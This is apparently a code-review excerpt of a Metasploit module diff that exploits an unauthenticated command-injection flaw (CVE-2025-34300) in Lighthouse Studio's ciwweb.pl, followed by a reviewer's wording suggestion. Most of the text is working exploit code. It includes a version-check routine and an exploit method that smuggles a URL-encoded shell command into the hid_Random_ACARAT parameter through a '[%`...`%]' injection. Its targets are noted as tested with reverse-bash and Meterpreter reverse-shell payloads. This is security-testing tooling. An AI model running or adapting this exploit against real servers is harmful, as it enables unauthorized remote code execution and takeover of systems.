modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb

```diff
@@ -0,0 +1,144 @@
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+              # Tested with cmd/unix/reverse_bash
+              # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => ['windows'],
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'FETCH_WRITABLE_DIR' => 'C:\\\\Windows\\\\Tasks\\\\'
+              }
+              # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-07-16',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']),
+        OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']),
+      ]
+    )
+  end
+
+  def check
+    print_status('Extracting version...')
+
+    vars = {
+      'hid_javascript' => '1'
+    }
+    vars['hid_studyname'] = datastore['STUDYNAME'] unless datastore['STUDYNAME'].strip.empty?
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'vars_get' => vars
+    )
+    return CheckCode::Unknown('No response from target') unless res
+
+    if res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/
+      version_match = Regexp.last_match(1).to_s
+      version = Rex::Version.new(version_match.gsub('_', '.'))
+      print_status("Extracted version: #{version}")
+
+      return CheckCode::Appears if version < Rex::Version.new('9.16.14')
+    else
+      print_error("#{peer} - Unable to extract version number")
+    end
+
+    html = res.get_html_document
+    if html&.text&.include?('Lighthouse Studio')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    print_status('Uploading malicious payload...')
+
+    cmd = Rex::Text.uri_encode(payload.encoded).gsub('\\', '%5C').gsub('/', '%2F')
+    cmd = "cmd.exe%20/q%20/c%20\"#{cmd}\"" if target['Type'] == :win_cmd
+
+    query = [
+      'hid_javascript=1',
+      "hid_Random_ACARAT=[%`#{cmd}`%]",
+      "hid_Random_ACARAT=#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"
+    ]
+
+    query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].strip.empty?
+    query_string = query.join('&')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'query' => query_string
+    })
+
+    if res
+      html = res.get_html_document
+      if html&.text&.include?('Cannot find default studyname')
+        fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid')
```

Comment:
```suggestion
        fail_with(Failure::BadConfig, 'The STUDYNAME value was not found on the server')
```
or something similar, to not get the users confused with the option not being a valid Metasploit Framework Option object/value. Not a blocker though 👍